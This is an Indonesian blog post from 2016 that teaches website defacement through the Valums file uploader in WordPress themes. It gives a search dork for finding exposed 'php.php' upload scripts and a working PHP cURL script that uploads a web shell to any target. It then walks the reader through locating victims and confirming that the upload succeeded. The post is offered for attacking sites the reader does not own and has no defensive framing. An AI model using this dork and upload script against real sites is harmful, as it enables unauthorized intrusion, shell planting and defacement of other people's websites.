Rabu, 20 April 2016

Tutorial Deface Dengan Wordpress Valums Uploader


   

   Assalamualaikum Wr.Wb

Kembali lagi bersama beta , sekarang beta mau berikan tutorial yg mungkin bermanfaat bagi kalian :D

Sekarang saya akan memberikan "Tutorial Deface Dengan Wordpress Valums Uploader"

tutorial ini hampir sama dengan tutor valums uploader , cuman klau yg ini pake wordpress

Oke klau gitu langsung aja. Cekidot!!!!

Dork : "index of /" "fileuploader.css" "php.php"

exploit : php.php

Csrf Xampp :

<?php
$uploadfile="shellmu.php";
$ch = curl_init("targetmu");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Klau ada yg blum bisa gunakan csrf xampp ini belajar dulu lah di google.com -_-

pertama cari target dengan menggunakan dork diatas .

klau dapat contoh kyak gini

site.com/wp-content/themes/blablalbalb/upload/php.php

klau mau tau vulnya nih liat gambar di bwah




ok sisa upload doang dengan CSRF Xamppnya :v

klau berhasil , nanti di csrf xamppnya ada tulisan "true" mungkin kyak gitu :v

klau mau nyari path uploadnya cari sendiri karena biasa beda beda :v


Ok gitu aja .

Terima kasih klau ada salah mohon di betulkan di komentar :D

Waasalamualaikum Wr.Wb


Thanks To : Mr.3RR0R - PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Share this

2 Responses to "Tutorial Deface Dengan Wordpress Valums Uploader"

  1. Stah, kalo Ngeblank vuln kaga ?
    bukan {"error":blablabla}

    BalasHapus